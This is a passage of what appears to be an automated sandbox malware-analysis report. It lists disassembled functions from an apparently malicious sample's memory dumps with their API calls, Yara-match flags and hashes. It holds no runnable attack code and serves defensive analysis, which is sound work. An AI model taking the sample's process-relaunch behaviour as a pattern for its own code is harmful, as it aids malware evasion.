                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C34B6D
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C34B80
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C34B83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3168844106-0
                                                                                                                            • Opcode ID: ceb3d1ae96895c94ac275b41c2eb214dc1e8eb912d296851b49ea345712976c8
                                                                                                                            • Instruction ID: 16623d430faf6faf339218e59afa3269987a5fcd57cf5614360752e1b88c18b5
                                                                                                                            • Opcode Fuzzy Hash: ceb3d1ae96895c94ac275b41c2eb214dc1e8eb912d296851b49ea345712976c8
                                                                                                                            • Instruction Fuzzy Hash: E6012C7AA006149FD7219B29FC84B9BB7E8AB88268F054D29E14683600C774FC458AA0
                                                                                                                            Function 03624B70 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03624B83
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03624B8D
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03624BA0
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03624BA3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3168844106-0
                                                                                                                            • Opcode ID: c6c4b94705998e1b984a06d4bcb506cc38385ef506af8ad77eb087aa606abc7f
                                                                                                                            • Instruction ID: f36a648b47c0876be8b48d7530b323c18587b7afb6c3467365948a8ed3393b60
                                                                                                                            • Opcode Fuzzy Hash: c6c4b94705998e1b984a06d4bcb506cc38385ef506af8ad77eb087aa606abc7f
                                                                                                                            • Instruction Fuzzy Hash: 5D01847A5046244FD721EB36FDC4B9BB7F8EF88215F150859F10683604C734E845CA64
                                                                                                                            Function 0289367A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 028936A2
                                                                                                                              • Part of subcall function 02893232: __getptd.LIBCMT ref: 02893240
                                                                                                                              • Part of subcall function 02893232: __getptd.LIBCMT ref: 0289324E
                                                                                                                            • __getptd.LIBCMT ref: 028936AC
                                                                                                                              • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                              • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                            • __getptd.LIBCMT ref: 028936BA
                                                                                                                            • __getptd.LIBCMT ref: 028936C8
                                                                                                                            • __getptd.LIBCMT ref: 028936D3
                                                                                                                              • Part of subcall function 028932D7: __CallSettingFrame@12.LIBCMT ref: 02893323
                                                                                                                              • Part of subcall function 028937A0: __getptd.LIBCMT ref: 028937AF
                                                                                                                              • Part of subcall function 028937A0: __getptd.LIBCMT ref: 028937BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3282538202-0
                                                                                                                            • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                            • Instruction ID: 9f562da0054c9847d26542a1764dca9d0c54cea5de4b13d1e3d32c1b15944322
                                                                                                                            • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                            • Instruction Fuzzy Hash: 4011C6B9C00209DFDF00EFA8C944AAD7BB1FF08314F1484A9E814EB250EB39AA559F51
                                                                                                                            Function 02C3E13F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 02C3E14B
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __getptd.LIBCMT ref: 02C3E162
                                                                                                                            • __amsg_exit.LIBCMT ref: 02C3E170
                                                                                                                            • __lock.LIBCMT ref: 02C3E180
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 02C3E194
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: d3cb5cb5a1a7e83140845e9b86113dc6d76f3fcdb5d2557dd65b84e2fdb79deb
                                                                                                                            • Instruction ID: 878377ca638dd211eb7a2a35fc632c334fe21e1192a0d1072bda48fd1bbcb795
                                                                                                                            • Opcode Fuzzy Hash: d3cb5cb5a1a7e83140845e9b86113dc6d76f3fcdb5d2557dd65b84e2fdb79deb
                                                                                                                            • Instruction Fuzzy Hash: 8BF0B432D447209BE737BBB8980279E33E26F00B20F148E09D455672C1CFB45601EF55
                                                                                                                            Function 03635006 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 03635012
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __getptd.LIBCMT ref: 03635029
                                                                                                                            • __amsg_exit.LIBCMT ref: 03635037
                                                                                                                            • __lock.LIBCMT ref: 03635047
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0363505B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: dcdbb2e437936cf5fa73adda1a4e65b40d3c662cca0b160b2bf41d911b5276b0
                                                                                                                            • Instruction ID: 221c3ba6427ec8d18463d4e2523f1aa3c425b84323ee9ca2f6f8c762cf8645f7
                                                                                                                            • Opcode Fuzzy Hash: dcdbb2e437936cf5fa73adda1a4e65b40d3c662cca0b160b2bf41d911b5276b0
                                                                                                                            • Instruction Fuzzy Hash: AFF0903A945700DAE761FBA99801B8EB3E0AF03B20F14010DD6266F3C0CF3584418B9E
                                                                                                                            Function 0288E116 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0288E122
                                                                                                                              • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                              • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                            • __getptd.LIBCMT ref: 0288E139
                                                                                                                            • __amsg_exit.LIBCMT ref: 0288E147
                                                                                                                            • __lock.LIBCMT ref: 0288E157
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0288E16B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                            • Instruction ID: 4717e109d3f11feb32530f71abb78b45ea0e8e3c9212be7baaea68f5f105e8a4
                                                                                                                            • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                            • Instruction Fuzzy Hash: 33F0B43EA44614DBDB29FBBC980177D32A2AF04729F144109F554EB3D1DB34A440DE5B
                                                                                                                            Function 034B49C5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 034B49D1
                                                                                                                              • Part of subcall function 034B381A: __getptd_noexit.LIBCMT ref: 034B381D
                                                                                                                              • Part of subcall function 034B381A: __amsg_exit.LIBCMT ref: 034B382A
                                                                                                                            • __getptd.LIBCMT ref: 034B49E8
                                                                                                                            • __amsg_exit.LIBCMT ref: 034B49F6
                                                                                                                            • __lock.LIBCMT ref: 034B4A06
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 034B4A1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                            • Instruction ID: 0b7436f166d0b83b746c00890d2e0ed0a44e04978ddb73f65c453f320cf3bd58
                                                                                                                            • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                            • Instruction Fuzzy Hash: 89F06D3A944720DFE621FFBB9802BCA76B4AF04620F15824FD414AF392DB2459418A7E
                                                                                                                            Function 0362C910 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 0362C932
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 0362C938
                                                                                                                            • GetStartupInfoW.KERNEL32(?), ref: 0362C947
                                                                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0362C96F
                                                                                                                            • ExitProcess.KERNEL32 ref: 0362C977
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3421218197-0
                                                                                                                            • Opcode ID: 6f25c89b656cde288031f36d19381f02ab0ca674dfa138e05b0298c167b6d516
                                                                                                                            • Instruction ID: dc01733d3d009466d369c960ccaac806793ce18695bdcefca03033c27deb1c2f
                                                                                                                            • Opcode Fuzzy Hash: 6f25c89b656cde288031f36d19381f02ab0ca674dfa138e05b0298c167b6d516
                                                                                                                            • Instruction Fuzzy Hash: 5DF05B75984318BBD720AB64DC5DFDB77B8FB04B00F200654B715A60D8DB706A44CF54
                                                                                                                            Function 036275B0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 036275D2
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 036275D8
                                                                                                                            • GetStartupInfoW.KERNEL32(?), ref: 036275E7
                                                                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0362760F
                                                                                                                            • ExitProcess.KERNEL32 ref: 03627617
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3421218197-0
                                                                                                                            • Opcode ID: 1d11b59397ba33164b0af99786070adfd4ff8e10881d1449db7dcd1269cc8d81
                                                                                                                            • Instruction ID: 4d0043280f8da34962767264f37c43e2f64c60b6ed46edeae343376f97ac1004
                                                                                                                            • Opcode Fuzzy Hash: 1d11b59397ba33164b0af99786070adfd4ff8e10881d1449db7dcd1269cc8d81
                                                                                                                            • Instruction Fuzzy Hash: 7BF05475984319BBE720ABA4DC5DFDA7BB8EB04B00F200694B719A60C8D7706A44CF54
                                                                                                                            Function 02C371AA Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C382F0: _doexit.LIBCMT ref: 02C382FC
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 02C371BC
                                                                                                                              • Part of subcall function 02C39754: TlsGetValue.KERNEL32(00000000,02C398AD,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000), ref: 02C3975D
                                                                                                                              • Part of subcall function 02C39754: DecodePointer.KERNEL32(?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA,0000000D), ref: 02C3976F
                                                                                                                              • Part of subcall function 02C39754: TlsSetValue.KERNEL32(00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA), ref: 02C3977E
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 02C371C7
                                                                                                                              • Part of subcall function 02C39734: TlsGetValue.KERNEL32(?,?,02C371CC,00000000), ref: 02C39742
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 02C371DA
                                                                                                                              • Part of subcall function 02C39788: DecodePointer.KERNEL32(?,?,?,02C371DF,00000000,?,00000000), ref: 02C39799
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C371E3
                                                                                                                            • ExitThread.KERNEL32 ref: 02C371EA
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C371F0
                                                                                                                            • __freefls@4.LIBCMT ref: 02C37210
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 781180411-0
                                                                                                                            • Opcode ID: d61bd0b17d868569e001f3c1af9aabcddf9375070fc18a780494c19310b271c8
                                                                                                                            • Instruction ID: 87c23112def72cc8cc4e3a64eb6970d6b0ce3e6ef9367345670e04762a54b2b5
                                                                                                                            • Opcode Fuzzy Hash: d61bd0b17d868569e001f3c1af9aabcddf9375070fc18a780494c19310b271c8
                                                                                                                            • Instruction Fuzzy Hash: B5E0467A8006096B8F023BB18D4CA9F7A6EAE42394B000D00FA10A3040EBB89911AAA1
                                                                                                                            Function 0362F9B8 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03631CD0: _doexit.LIBCMT ref: 03631CDC
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0362F9CA
                                                                                                                              • Part of subcall function 03633CA0: TlsGetValue.KERNEL32(00000000,03633DF9,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000), ref: 03633CA9
                                                                                                                              • Part of subcall function 03633CA0: DecodePointer.KERNEL32(?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06,0000000D), ref: 03633CBB
                                                                                                                              • Part of subcall function 03633CA0: TlsSetValue.KERNEL32(00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06), ref: 03633CCA
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0362F9D5
                                                                                                                              • Part of subcall function 03633C80: TlsGetValue.KERNEL32(?,?,0362F9DA,00000000), ref: 03633C8E
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 0362F9E8
                                                                                                                              • Part of subcall function 03633CD4: DecodePointer.KERNEL32(?,?,?,0362F9ED,00000000,?,00000000), ref: 03633CE5
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 0362F9F1
                                                                                                                            • ExitThread.KERNEL32 ref: 0362F9F8
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362F9FE
                                                                                                                            • __freefls@4.LIBCMT ref: 0362FA1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 781180411-0
                                                                                                                            • Opcode ID: f8afe5ff3c7618405e2bddd8bb93c3521a0e87263ea4006e259261cb6895ebc4
                                                                                                                            • Instruction ID: 865ba6141be67ca50b48bb5ad1b433bf4593751b521a9c5acee748c284bef88f
                                                                                                                            • Opcode Fuzzy Hash: f8afe5ff3c7618405e2bddd8bb93c3521a0e87263ea4006e259261cb6895ebc4
                                                                                                                            • Instruction Fuzzy Hash: 97E0BF3DE4071977CB00BBB19E0999F7A2C5E03185B350458FA159F604DA68955187AD
                                                                                                                            Function 03629430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0362944A
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EF9B
                                                                                                                              • Part of subcall function 0362EF86: __CxxThrowException@8.LIBCMT ref: 0362EFB0
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EFC1
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 03629482
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF4E
                                                                                                                              • Part of subcall function 0362EF39: __CxxThrowException@8.LIBCMT ref: 0362EF63
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF74
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 1823113695-4289949731
                                                                                                                            • Opcode ID: e9b18e488e74c96efb90dbafa73938d2aefe79c0e2ddc77c41b076be4abe19b7
                                                                                                                            • Instruction ID: d1f202bce1b7309c464887c36885a769e60e4bd7928202bf27e3aaed57b9822e
                                                                                                                            • Opcode Fuzzy Hash: e9b18e488e74c96efb90dbafa73938d2aefe79c0e2ddc77c41b076be4abe19b7
                                                                                                                            • Instruction Fuzzy Hash: C8219533700A204BC720DD5CE88099AFBD9EBD5764F160A7FE192CB240D761D8508BB5
                                                                                                                            Function 036284B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 036284C9
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EF9B
                                                                                                                              • Part of subcall function 0362EF86: __CxxThrowException@8.LIBCMT ref: 0362EFB0
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EFC1
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 036284E7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 963545896-4289949731
                                                                                                                            • Opcode ID: c01ded2327a3f2fab48b31a6618df0b8eedf8d5631ba25aaeeab3081b29490c1
                                                                                                                            • Instruction ID: b5e1480444be0b6a01f7f3eadff9b364762b1d24d1b2eaebce8fc4cad44d261e
                                                                                                                            • Opcode Fuzzy Hash: c01ded2327a3f2fab48b31a6618df0b8eedf8d5631ba25aaeeab3081b29490c1
                                                                                                                            • Instruction Fuzzy Hash: 2421D2317007269F8714DF6CED80C59B7A9BF88310701452DE916DB741E730EA14CBA4
                                                                                                                            Function 02893A27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 02893A3A
                                                                                                                              • Part of subcall function 02893995: ___BuildCatchObjectHelper.LIBCMT ref: 028939CB
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 02893A51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3487967840-3733052814
                                                                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                            • Instruction ID: e5cf4e7924f0ecab90c470f09624c39d8323bcc67ed12400502e621476769e6b
                                                                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                            • Instruction Fuzzy Hash: 1C01E47D00050ABBDF12AE55CC48EAA7FAAEF09354F088050BD1C95560D73299B1DBA2
                                                                                                                            Function 0362D830 Relevance: 6.4, APIs: 5, Instructions: 140COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 0362D868
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 0362D938
                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 0362D963
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Read$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2715074504-0
                                                                                                                            • Opcode ID: 4274ee5986e5920afb459a3da7a7fc20699de49956b23b07e6cb9c263a5abc62
                                                                                                                            • Instruction ID: 70ab52cf5f0efbef70f1b604ed1d168a333fd599e006fb95cace1c9c0a2d6e7a
                                                                                                                            • Opcode Fuzzy Hash: 4274ee5986e5920afb459a3da7a7fc20699de49956b23b07e6cb9c263a5abc62
                                                                                                                            • Instruction Fuzzy Hash: C241BA70A0060AAFDB10CF9AD880B6AFBF9FF88314F158599E82997340D774E901CF90
                                                                                                                            Function 02889A9D Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
